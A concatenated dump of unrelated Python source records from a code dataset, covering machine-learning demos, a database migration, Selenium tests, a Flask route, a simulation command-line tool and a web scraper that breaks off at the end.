test_size=0.5, shuffle=False)\r\n\r\n# Learn the digits on the train subset\r\nclf.fit(X_train, y_train)\r\n\r\n# Predict the value of the digit on the test subset\r\npredicted = clf.predict(X_test)\r\n_, axes = plt.subplots(nrows=1, ncols=4, figsize=(10, 3))\r\nfor ax, image, prediction in zip(axes, X_test, predicted):\r\n ax.set_axis_off()\r\n image = image.reshape(8, 8)\r\n ax.imshow(image, cmap=plt.cm.gray_r, interpolation='nearest')\r\n ax.set_title(f'Prediction: {prediction}')\r\n\r\ndisp = metrics.plot_confusion_matrix(clf, X_test, y_test)\r\ndisp.figure_.suptitle(\"Confusion Matrix\")\r\nprint( f\"Confusion matrix:\\n{disp.confusion_matrix}\")\r\nplt.show()","sub_path":"Support Vector Machine.py","file_name":"Support Vector Machine.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42917779","text":"\"\"\"empty message\n\nRevision ID: 26eae050829d\nRevises: 302baee6981f\nCreate Date: 2017-01-10 12:33:15.506871\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26eae050829d'\ndown_revision = '302baee6981f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('province',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('keyword', sa.String(length=150), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('district',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('province_code', sa.String(length=10), nullable=True),\n sa.Column('province_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['province_id'], ['province.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('sector',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('code', sa.String(length=100), nullable=True),\n sa.Column('district_code', sa.String(length=10), nullable=True),\n sa.Column('district_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['district_id'], ['district.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('sector')\n op.drop_table('district')\n op.drop_table('province')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/26eae050829d_.py","file_name":"26eae050829d_.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"81988651","text":"# CC notes 17: Chap 8 - Functions\n\n''' Passing an arbitrary number of arguments: \n - Uses the * operator which packs the arbitrary number of arguments into\n a tuple\n \n - Python will pack the argument into a tuple even if it is given only one\n argument. 
\n'''\ndef make_pizza(*toppings):\n print(toppings)\n \nmake_pizza('pepperoni',)\nmake_pizza('mushrooms', 'green peppers', 'extra cheese')\n\nprint('\\nReplacing the print statement and adding a loop:')\n\ndef make_pizza_01(*toppings):\n \n print('\\nMaking a pizza with the following toppings:')\n for topping in toppings:\n print(\"- \" + topping)\n \nmake_pizza_01('pepperoni',)\nmake_pizza_01('mushrooms', 'green peppers', 'extra cheese')\n\n''' Mixing Positional and Arbitrary arguments:\n - The parameter that accepts an arbitrary number of arguments must be listed\n last in the arguments list of the function:\n'''\ndef make_pizza_02(size, *toppings):\n print(\"\\nMaking a \" + str(size) + \"-inch pizza with the following toppings:\")\n \n for topping in toppings:\n print(\"- \" + topping)\n\nprint(\"\\nMixing Positional & Arbitrary arguments example:\")\n \nmake_pizza_02(16, 'pepperoni',)\nmake_pizza_02(12, 'mushrooms', 'green peppers', 'extra cheese')\n\n''' Python stores the first value received in the parameter 'size', all following\n values are stored in the tuple 'toppings'.\n'''\n\n''' Arbitrary keyword arguments: \n\n Want to accept as many key-value pairs as necessary, but don't know what kind \n of info will be put there:\n'''\n\nprint(\"\\nArbitrary keyword arguments:\\n\")\n\ndef build_profile(first, last, **user_info):\n \n profile = {}\n profile['first name'] = first\n profile['last name'] = last\n \n for key, value in user_info.items():\n profile[key] = value\n \n return profile\n\nuser_profile = build_profile('albert', 'einstein', location = 'princeton',\n field = 'physics')\nprint(user_profile)\n\nprint(\"\\nTry it yourself exercises:\")\nprint(\"\\n8-12: Sandwiches:\")\n\ndef sandwich_ingredients(*items):\n \n print(\"\\nThe sandwich ordered has the following items on it:\")\n for item in items:\n print(\"- \" + item)\n \nsandwich_ingredients('roast beef',)\nsandwich_ingredients('ham', 'cheese')\nsandwich_ingredients('salami', 'bologna', 'pepperjack cheese')\n\nprint(\"\\n8-13: User Profile:\")\n\nmy_profile = build_profile(\"Lucius\", \"Vorenus\", profession = \"centurion\", \n legion = \"11th\", commander = \"caesar\")\n\nprint(my_profile)\n\nprint(\"\\n8-14: Cars:\")\n\ndef make_car(make, model, **optional):\n \n car_profile = {}\n car_profile[\"make\"] = make\n car_profile[\"model\"] = model\n \n for key, value in optional.items():\n car_profile[key] = value\n \n return car_profile\n\ncar = make_car('subaru', 'outback', color = 'blue', tow_package = True)\nprint(car)","sub_path":"Python_Crash_Course_text/Crash_course_notes_17.py","file_name":"Crash_course_notes_17.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152789665","text":"# -*- coding:UTF-8 -*-\n#$/Service/__init__.py\n#Date:2013-09-09\n\nimport base64\nimport traceback\n\nfrom config import *\nfrom threading import Thread\nfrom datetime import datetime\nfrom mysql import connector\nfrom DBUtils.PooledDB import PooledDB\n\n__all__ = [\n\t\t'_get_connect',\n\t\t'verify_token'\n\t\t]\n\ndef _get_connect():\n\treturn _pool.connection() \n\ndef verify_token(token):\n\t'''verify token weather still valid\n\treturn (0)no_token or (-1)token_overdate or user_id\n\t'''\n\tconn = _get_connect()\n\tcur = conn.cursor()\n\ttry:\n\t\treturn cur.callproc('sp_verify_token', (token,\n\t\t\tTOKEN_VALID_DAY, 0))[2]\n\texcept Exception:\n\t\tprint('===============caught 
exception=============')\n\t\tprint(traceback.format_exc())\n\tfinally:\n\t\tcur.close()\n\t\tconn.close()\n\ndef _build_insert_sql(table, columns):\n\tc = len(columns)\n\tsql = 'INSERT INTO ' + table + '(' + ('%s,' * c)[0:-1] + ')'\n\tsql %= columns\n\tsql += 'VALUES(' + ('%s,' * c)[0:-1] + ')'\n\treturn sql\n\n#init db connection pool\n_pool = PooledDB(connector, mincached=1, maxusage=5,\n\thost='localhost', user='travo',\n\tpasswd='travo',db='travo')\n","sub_path":"Travo-Server/travo/service/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510067274","text":"#!/usr/bin/python\r\n#coding=utf-8 \r\n\r\n\"\"\"\r\nCopyright 2012 Telefonica Investigación y Desarrollo, S.A.U\r\n\r\nThis file is part of Billing_PoC.\r\n\r\nBilling_PoC is free software: you can redistribute it and/or modify it under the terms \r\nof the GNU Affero General Public License as published by the Free Software Foundation, either \r\nversion 3 of the License, or (at your option) any later version.\r\nBilling_PoC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even \r\nthe implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero \r\nGeneral Public License for more details.\r\n\r\nYou should have received a copy of the GNU Affero General Public License along with Billing_PoC. \r\nIf not, see http://www.gnu.org/licenses/.\r\n\r\nFor those usages not covered by the GNU Affero General Public License please contact with::mac@tid.es\r\n\"\"\" \r\n\r\n'''\r\nCreated on 31/10/2012\r\n\r\n@author: mac@tid.es\r\n'''\r\n\r\nfrom common.salesforce.salesforce import get_customers\r\n\r\ndef get_customer_details_from_sf(account_id):\r\n \r\n (contact, account) = get_customers(account_id)\r\n \r\n if contact == None:\r\n return {}\r\n\r\n return {\r\n 'name' : account.Name, \r\n 'address' : account.BillingStreet, \r\n 'city' : account.BillingCity, \r\n 'postal_code': account.BillingPostalCode, \r\n 'email' : contact.Email,\r\n 'country' : account.BillingCountry,\r\n 'order' : 'f4f5e91595'\r\n }\r\n\r\ndef customer_details_from_sf(invoice_json):\r\n account_id = invoice_json['contract']\r\n \r\n # Adding customer details\r\n invoice_json['customer'] = get_customer_details_from_sf(account_id)\r\n \r\n return invoice_json","sub_path":"invoicer/customer/salesforce.py","file_name":"salesforce.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142481649","text":"import matplotlib.pyplot as plt\nfrom scipy import spatial\nfrom PIL import Image\nimport numpy as np\n\n# 读取图片,并且修改图片大小\nG_sm = np.array(Image.open('2.jpg').resize([100, 100]).getdata()).reshape([100, 100, 3]) / 256\n\n# 显示图片\nplt.figure()\nplt.imshow(G_sm)\nplt.title('Original Image')\nplt.show()\n\n# 读取emoji数据\nemoji_array = np.load(\"emojis_16.npy\")\n\n# 获取emoji的平均颜色值\nemoji_mean_array = np.array([ar.mean(axis=(0, 1)) for ar in emoji_array])\n\n# 将得到的每个emoji平均颜色值存储在树中以加快搜索速度\ntree = spatial.KDTree(emoji_mean_array)\n\nindices = []\n# 平整数组,一维\nflattened_img = G_sm.reshape(-1, G_sm.shape[-1])\nprint(flattened_img.shape)\n\n# 匹配最相似的表情符号的像素\nfor pixel in flattened_img:\n pixel_ = np.concatenate((pixel, [1]))\n # 查询最近的索引\n _, index = tree.query(pixel_)\n indices.append(index)\n\n# 从索引中获取对应的表情符号\nemoji_matches = emoji_array[indices]\n\n# 获取图片的高度\ndim = G_sm.shape[0]\nprint(dim)\n\n# 
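set the size of the final output image; each emoji patch has shape (16, 16, 4): R, G, B, alpha. 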
设置最终生成图像的大小,每个表情符号的形状都是(16,16,4),R, G, B, alpha\nresized_ar = emoji_matches.reshape((dim, dim, 16, 16, 4))\n\n# 转换单个表情符号补丁(5维)\n# 使用numpy块生成完整的图像(三维)\nfinal_img = np.block([[[x] for x in row] for row in resized_ar])\n\n# 设置画布\nplt.figure()\n# 去除坐标轴\nplt.axis('off')\n# 显示图片\nplt.imshow(final_img)\n# 保存emoji马赛克风格图像,去除白边\nplt.savefig('image_emoji.png', bbox_inches=\"tight\", pad_inches=0.0, dpi=600)\n\nplt.show()\n","sub_path":"Emoji.py","file_name":"Emoji.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"395756121","text":"import sys\nx = int(input())\n\na = 0\nwhile a < 1000:\n b = -1000\n while b < 1000:\n if a ** 5 - b ** 5 == x:\n print(a, b)\n sys.exit()\n b += 1\n a += 1","sub_path":"beginner_contest166/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598054572","text":"# coding=utf-8\nimport unittest\nimport time\n\nfrom pages.video_page.page_object import VideoPage\nfrom pages.videos_page.page_object import VideosPage\nfrom pages.login_page.page_object import LoginPage\nfrom pages.admin_page.page_object import AdminPage\nfrom pages.admin_page.videos_create_page import VideosCreatePage\nfrom pages.favorites_video_page.page_object import FavoritesVideoPage\n\nfrom configuration import TEST_USER_EMAIL, TEST_USER_PASSWORD\n\n\nfrom utils.utils import get_remote_driver, get_language_from_url\nfrom utils.waiter import wait_for_animation_stopped\n\n\nclass VideoTest(unittest.TestCase):\n COUNT_TEST_VIDEO = 5\n VIDEO_TITLE = 'VIDEO_{0}_TITLE'\n\n @classmethod\n def setUpClass(cls):\n driver = get_remote_driver()\n admin_page = AdminPage(driver)\n admin_page.open()\n admin_page.login()\n videos_page = VideosCreatePage(driver)\n\n for i in range(1, cls.COUNT_TEST_VIDEO):\n video_data = videos_page.load_video(i)\n videos_page.open()\n videos_page.open_video_created_page()\n videos_page.set_fields_from_resours(video_data)\n videos_page.save_video()\n setattr(cls, cls.VIDEO_TITLE.format(i), video_data['title'])\n\n videos_page.search_video(cls.VIDEO_1_TITLE)\n cls.VIDEO_ID = videos_page.get_id_video(cls.VIDEO_1_TITLE)\n\n admin_page.logout()\n driver.quit()\n\n def setUp(self):\n self.driver = get_remote_driver()\n self.video_page = VideoPage(self.driver, self.VIDEO_ID)\n self.video_page.open()\n self.LANGUAGE = get_language_from_url(self.driver)\n wait_for_animation_stopped(self.driver)\n\n def test_01_video_page_exists(self):\n self.assertEquals(self.video_page.title, self.video_page.expected_title)\n\n def test_video_plays(self):\n self.video_page.click_on_video()\n is_youtube_video_presented = self.video_page.is_youtube_video_presented()\n self.assertTrue(is_youtube_video_presented)\n\n def test_click_on_tag_on_video_page_leads_to_filtering_by_tag(self):\n first_item_tag = self.video_page.get_first_tag()\n self.video_page.click_on_first_tag()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if first_item_tag in video_item.get_tags():\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n def test_click_on_category_on_video_page_leads_to_filtering_by_category(self):\n category = self.video_page.get_category()\n self.video_page.click_on_category()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n 
for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if video_item.get_category() == category:\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n def test_go_to_related_video(self):\n first_related_video_title = self.video_page.get_first_related_video_title()\n self.video_page.go_first_related_video()\n related_video_page = VideoPage(self.driver)\n self.assertEquals(first_related_video_title, related_video_page.get_video_title())\n\n def test_click_on_tag_on_related_video_leads_to_filtering_by_tag(self):\n self.video_page.go_first_related_video()\n related_video_page = VideoPage(self.driver)\n first_related_video_tag = related_video_page.get_first_tag()\n\n related_video_page.click_on_first_tag()\n videos_page = VideosPage(self.driver)\n items_are_filtered = True\n for i in xrange(1, videos_page.videos.get_size()):\n video_item = videos_page.videos.get_video(i)\n if first_related_video_tag in video_item.get_tags():\n continue\n else:\n items_are_filtered = False\n break\n self.assertTrue(items_are_filtered)\n\n # Кнопки \"Все похожие видео\" больше нет\n # def test_click_show_all_related_videos(self):\n # self.video_page.go_all_related_videos()\n # is_current_url_contains_parameter = \"rel=\" + str(self.VIDEO_ID) in self.driver.current_url\n # self.assertTrue(is_current_url_contains_parameter)\n\n def test_call_auth_popup_after_click_on_play_more_than_two_times(self):\n is_auth_popup_showed = False\n\n current_video_page = self.video_page\n for i in range(1, 5):\n current_video_page.go_first_related_video()\n current_video_page = VideoPage(self.driver)\n current_video_page.click_on_video()\n if current_video_page.auth_popup_is_showed():\n is_auth_popup_showed = True\n continue\n\n self.failUnless(is_auth_popup_showed is True)\n current_video_page.click_on_auth_button_in_popup()\n login_page = LoginPage(self.driver)\n self.assertEqual(login_page.url, login_page.expected_url)\n\n def test_call_auth_popup_and_redirect_to_video_after_click_favorite_star(self):\n video_url = self.video_page.url\n self.video_page.click_on_favorite_star()\n self.video_page.click_on_auth_button_in_popup()\n\n login_page = LoginPage(self.driver)\n login_page.form.set_email(TEST_USER_EMAIL)\n login_page.form.set_password_1(TEST_USER_PASSWORD)\n login_page.form.submit_form()\n\n redirect_to_video_url = self.driver.current_url\n self.assertEqual(redirect_to_video_url.replace('{0}/'.format(self.LANGUAGE), ''), video_url)\n\n def test_add_video_in_favorites(self):\n login_page = LoginPage(self.driver)\n login_page.open()\n\n login_page.form.set_email(TEST_USER_EMAIL)\n login_page.form.set_password_1(TEST_USER_PASSWORD)\n login_page.form.submit_form()\n\n self.video_page.open()\n video_title = self.video_page.get_video_title()\n self.video_page.click_on_favorite_star()\n\n favourites_video_page = FavoritesVideoPage(self.driver)\n favourites_video_page.open()\n self.failUnlessEqual(favourites_video_page.videos.get_video().get_title(), video_title)\n\n self.video_page.open()\n self.video_page.click_on_favorite_star()\n\n favourites_video_page.open()\n self.failIfEqual(favourites_video_page.videos.get_video().get_title(), video_title)\n\n def tearDown(self):\n self.driver.quit()\n\n @classmethod\n def tearDownClass(cls):\n driver = get_remote_driver()\n admin_page = AdminPage(driver)\n admin_page.open()\n admin_page.login()\n videos_page = VideosCreatePage(driver)\n\n videos_page.open()\n 
videos_page.search_video(cls.VIDEO_1_TITLE)\n\n for i in range(1, cls.COUNT_TEST_VIDEO):\n videos_page.delete_created_video(getattr(cls, cls.VIDEO_TITLE.format(i)))\n\n admin_page.logout()\n driver.quit()\n","sub_path":"tests/test_video_page.py","file_name":"test_video_page.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"91657824","text":"# -*- coding: utf-8 -*-\n\"\"\"Exercise 3.\n\nRidge Regression\n\"\"\"\n\nimport numpy as np\n\n\ndef ridge_regression(y, tx, lambda_):\n \"\"\"implement ridge regression.\"\"\"\n reg = 2 * len(tx) * lambda_ * np.identity(tx.shape[1])\n lt = np.dot(tx.T, tx) + reg\n rt = np.dot(tx.T, y)\n # solve seems to work better than inv?\n opt_weights = np.linalg.solve(lt, rt)\n return opt_weights\n","sub_path":"labs/ex04/template/ridge_regression.py","file_name":"ridge_regression.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84808662","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"ニュース view\"\"\"\n\n# ##########################################################\n# Copyright 2016 Miyamoto. All Rights Reserved.\n#\n# app.views.news\n#\n# 履歴:\n# Date Version Updater Description\n# 2016/01/31 1.0.0 Miyamoto 初版。\n# ##########################################################\n\nimport os\n\nfrom flask import Blueprint, send_from_directory, current_app\n\n# ニュース用 Blueprint を定義\nbp = Blueprint('news', __name__, url_prefix='/news')\n\n\n@bp.route('/news.json', methods=['GET'])\ndef news():\n \"\"\"\n ニュース\n\n :return: static/json/news.json\n \"\"\"\n\n # static ファイルを返す\n return send_from_directory(\n os.path.join(current_app.root_path, 'static'),\n 'json/news.json',\n mimetype='application/json'\n )\n","sub_path":"app/views/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360409655","text":"import cv2\nalg = \"haarcascade_frontalface_default.xml\"\nhaar_cascade = cv2.CascadeClassifier(alg)\ncam = cv2.VideoCapture(0)\n\nwhile True:\n text = \"Face Not Detected\"\n _,img = cam.read()\n grayImg = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n face = haar_cascade.detectMultiScale(grayImg,1.3,4)\n for (x,y,w,h) in face:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2)\n text = \"Face Detected\"\n print(text)\n cv2.putText(img,text,(10,20),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,255),2)\n cv2.imshow(\"FaceDetection\",img)\n key = cv2.waitKey(10)\n if key == 27:\n break\n\ncam.release()\ncv2.destroyAllWindows()\n","sub_path":"FaceDetectionUsingOpenCV.py","file_name":"FaceDetectionUsingOpenCV.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193396206","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2018/11/15 14:01\n@Author : LI Zhe\n\"\"\"\nimport torch\nfrom torch.utils.data import DataLoader\nimport torchvision\nfrom torchvision import transforms, utils\nimport matplotlib.pyplot as plt\n\nimg_data = torchvision.datasets.ImageFolder('./../data/flower_photos',\n transform=transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224), # 中心化\n transforms.ToTensor()\n ])\n )\nprint(len(img_data))\ndata_loader = DataLoader(img_data, batch_size=20, shuffle=True)\nprint(len(data_loader))\n\ndef show_batch(imgs):\n grid = 
utils.make_grid(imgs, nrow=5)\n plt.imshow(grid.numpy().transpose(1, 2, 0))\n plt.title('Batch from dataloader')\n\nfor i, (batch_x, batch_y) in enumerate(data_loader):\n if i < 4:\n print(i, batch_x.size(), batch_y.size())\n show_batch(batch_x)\n print(batch_y)\n plt.axis('off')\n plt.show()","sub_path":"PyTorch/Make_own_datasets/mydataset_from_flowers.py","file_name":"mydataset_from_flowers.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"432177367","text":"# regex search.py - opens all .txt files in a folder and searches for any line\n# that matches a user-supplied regular expression\n\n\nimport re, os\n\n\nfilePath = '.'\nregexFile = re.compile(r'.*\\.txt')\n# Ask user for the keyword he wants to search\nuserSearch = input('What do you want to search?: ')\nuserRegex = re.compile(userSearch, re.I)\n\n\ndef searchTextFiles(path):\n files = [f for f in os.listdir() if regexFile.match(f)]\n matchCount = 0\n print('Matches found in file(s):')\n for file in files:\n openFile = open(file, 'r')\n matches = userRegex.findall(openFile.read())\n if matches:\n matchCount += 1\n print(file)\n print('Occurrences: ', len(matches))\n if not matchCount:\n print('There is no \"%s\" keyword in any of the files' % userSearch)\n\n\nsearchTextFiles(filePath)\n\n","sub_path":"SearchKeywordInFiles/matchingRegex.py","file_name":"matchingRegex.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592570435","text":"import argparse\nimport logging\nimport tempfile\nimport os\nimport sys\nfrom typing import Literal, Optional\nfrom functools import cached_property\nimport yaml\n\nfrom mirage.sim import Simulation, MacrolensingSimulation, MicrolensingSimulation\nfrom mirage.util import Dictify, ClusterProvider, LocalClusterProvider\nfrom mirage.calc import reducers\nfrom mirage.calc.batch_runner import BatchRunner\n\nlogger = logging.getLogger(\"mirage_main\")\n\n\nclass MirageMain:\n\n def __init__(self):\n self.parser = argparse.ArgumentParser()\n self._bind_arguments()\n self.args = self.parser.parse_args()\n self.configure_logger()\n\n def _bind_arguments(self):\n a = self.parser\n self.parser.add_argument(\n \"-r\",\n \"--read_sim\",\n type=str,\n required=False,\n nargs=1,\n help=\"Simulation yaml file to load\",\n )\n self.parser.add_argument(\n \"-c\",\n \"--cluster\",\n required=False,\n nargs=1,\n type=str,\n default=\"cluster.yaml\",\n help=\"Filename containing the cluster spec to use. If not provided, the program\"\n \"looks for a `cluster.yaml` in the current directory. Otherwise, a default\"\n \"cluster on localhost is provisioned\",\n )\n self.parser.add_argument(\n \"-w\",\n \"--write\",\n required=False,\n nargs=1,\n type=str,\n help=\"The file to write the results of the simulation to.\"\n \"Ignored if runing in interractive mode.\",\n )\n self.parser.add_argument(\n \"-l\",\n \"--logs_directory\",\n type=str,\n required=False,\n nargs=1,\n help=\"directory to save logs to. 
If not provided a temporary directory is chosen\",\n )\n self.parser.add_argument(\n \"-v\", \"--viz\", action=\"store_true\", help=\"Launch in visualization mode\"\n )\n self.parser.add_argument(\n \"-i\",\n \"--interractive\",\n action=\"store_true\",\n help=\"Launch in interractive mode\",\n )\n self.parser.add_argument(\"--debug\", action=\"store_true\", help=\"Log debug messages\")\n self.parser.add_argument(\n \"-f\",\n \"--force\",\n action=\"store_true\",\n help=\"If specified, overwirtes output file if it already exists\",\n )\n\n @cached_property\n def logfile(self) -> str:\n if self.args.logs_directory:\n directory = self.args.logs_directory[0]\n directory = os.path.join(tempfile.gettempdir(), \"mirage\", \"logs\")\n os.makedirs(directory, exist_ok=True)\n existing_files = os.listdir(directory)\n return os.path.join(directory, f\"debug_{len(existing_files)}.log\")\n\n def configure_logger(self):\n logging.basicConfig(\n level=logging.DEBUG if self.args.debug else logging.INFO,\n format=\"%(asctime)s [%(processName)15s] %(levelname)5s - %(name)s | %(message)s\",\n handlers=[\n logging.FileHandler(self.logfile),\n logging.StreamHandler(sys.stdout),\n ],\n )\n logger.info(\"Writing logs to \" + self.logfile)\n\n @property\n def run_mode(self) -> Literal[\"batch\", \"interractive\", \"viz\"]:\n if self.args.viz:\n return \"viz\"\n if self.args.interractive:\n return \"interractive\"\n return \"batch\"\n\n @property\n def output_file(self) -> Optional[str]:\n if self.args.write:\n output_name = self.args.write[0]\n if not output_name.endswith(\".zip\"):\n output_name = output_name + \".zip\"\n if os.path.exists(output_name) and not self.overwrite:\n raise ValueError(\n f\"Output file {output_name} already exists.\"\n \" To overwrite, please try again with the '-f' flag\"\n )\n return output_name\n return None\n\n @property\n def cluster_provider(self) -> ClusterProvider:\n try:\n cluster = Dictify.from_yaml(ClusterProvider, self.args.cluster[0]) # type: ignore\n logger.info(\n f\"Constructed {type(cluster).__name__} cluster from file {self.args.cluster[0]}\"\n )\n return cluster\n except FileNotFoundError:\n logger.info(\"No cluster config file found. 
Using default local cluster\")\n return LocalClusterProvider()\n\n @property\n def overwrite(self) -> bool:\n return bool(self.args.force)\n\n def load_simulation(self) -> Optional[Simulation]:\n if not self.args.read_sim:\n return None\n\n sim_file = self.args.read_sim[0]\n if not os.path.exists(sim_file):\n raise ValueError(f\"File not found: {sim_file}\")\n\n logger.info(f\"Loading simulation from file: {sim_file}\")\n\n with open(sim_file) as f:\n yaml_str = f.read()\n logger.debug(\"Contents:\\n\" + yaml_str)\n\n sim_dict = yaml.load(yaml_str, yaml.CLoader)\n\n simulation = Simulation.from_dict(sim_dict) # type: ignore\n\n logger.info(f\"Constructed Simulation of type: {type(simulation).__name__}\")\n return simulation\n\n\nif __name__ == \"__main__\":\n main = MirageMain()\n\n simulation = main.load_simulation()\n run_mode = main.run_mode\n\n if run_mode == \"batch\" and simulation and main.output_file:\n logger.info(\"Running Batch Job\")\n batch_runner = BatchRunner(simulation, main.output_file, main.cluster_provider)\n batch_runner.start()\n logger.info(\"Goodbye!\")\n\n if run_mode == \"interractive\":\n raise NotImplementedError()\n\n if run_mode == \"viz\" and simulation:\n from mirage.viz import VizRunner\n\n logger.info(\"Running visualization\")\n viz_runner = VizRunner(simulation)\n viz_runner.start()\n logger.info(\"Goodbye!\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59581950","text":"import os\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\n# --------------------------------------------- Create contents ----------------------------------------------------- #\n# hits the newswires at 8:30 a.m. 
Eastern Time on the first Friday of every month;\n# along with first revision to prior month and second revision to two month earlier\ndef generate_html(today):\n url = 'https://tradingeconomics.com/united-states/non-farm-payrolls'\n page = requests.get(url)\n content = page.content.decode('utf-8')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n cols = ['Calendar', 'GMT', 'Reference', 'Actual', 'Previous', 'Consensus', 'TEForecast']\n df = pd.DataFrame(columns=cols)\n row = {}\n i = 0\n for td in soup.find_all(\"td\"):\n txt = td.get_text().strip()\n try:\n dt = datetime.strptime(txt, '%Y-%m-%d')\n if len(row) > 0:\n df_row = pd.DataFrame(row, index=[row['Calendar']])\n df = pd.concat([df, df_row], axis=0)\n row['Calendar'] = dt\n i = 1\n except: # dt is not date\n if 'non farm payrolls' in txt.lower():\n continue\n if i < 1:\n continue\n try:\n row[cols[i]] = txt\n i = i + 1\n except:\n break\n df.set_index('Calendar', inplace=True)\n\n release_date = df[df.Actual != ''].index[-1]\n\n if release_date.month < today.month: # monthly update\n return None\n\n url = 'https://tradingeconomics.com/united-states/unemployment-rate'\n page = requests.get(url)\n content = page.content.decode('utf-8')\n soup = BeautifulSoup(page.content, 'html.parser')\n\n cols = ['Calendar', 'GMT', 'Reference', 'Actual', 'Previous', 'Consensus', 'TEForecast']\n df2 = pd.DataFrame(columns=cols)\n row = {}\n i = 0\n for td in soup.find_all(\"td\"):\n txt = td.get_text().strip()\n try:\n dt = datetime.strptime(txt, '%Y-%m-%d')\n if len(row) > 0:\n df_row = pd.DataFrame(row, index=[row['Calendar']])\n df2 = pd.concat([df2, df_row], axis=0)\n row['Calendar'] = dt\n i = 1\n except: # dt is not date\n if 'unemployment rate' in txt.lower():\n continue\n if i < 1:\n continue\n try:\n row[cols[i]] = txt\n i = i + 1\n except:\n break\n df2.set_index('Calendar', inplace=True)\n\n title = '

Monthly Non-farm Payroll and Unemployment Rate

'\n body = df.to_html(border=None) # .replace('border=\"1\"','')\n body2 = df2.to_html(border=None) # .replace('border=\"1\"','')\n\n # --------------------------------------- Create and Send out HTML ------------------------------------------------- #\n\n html_string = f'''\n \n \n \n \n \n \n \n \n \n
{title}
\n
{body}
\n
{body2}
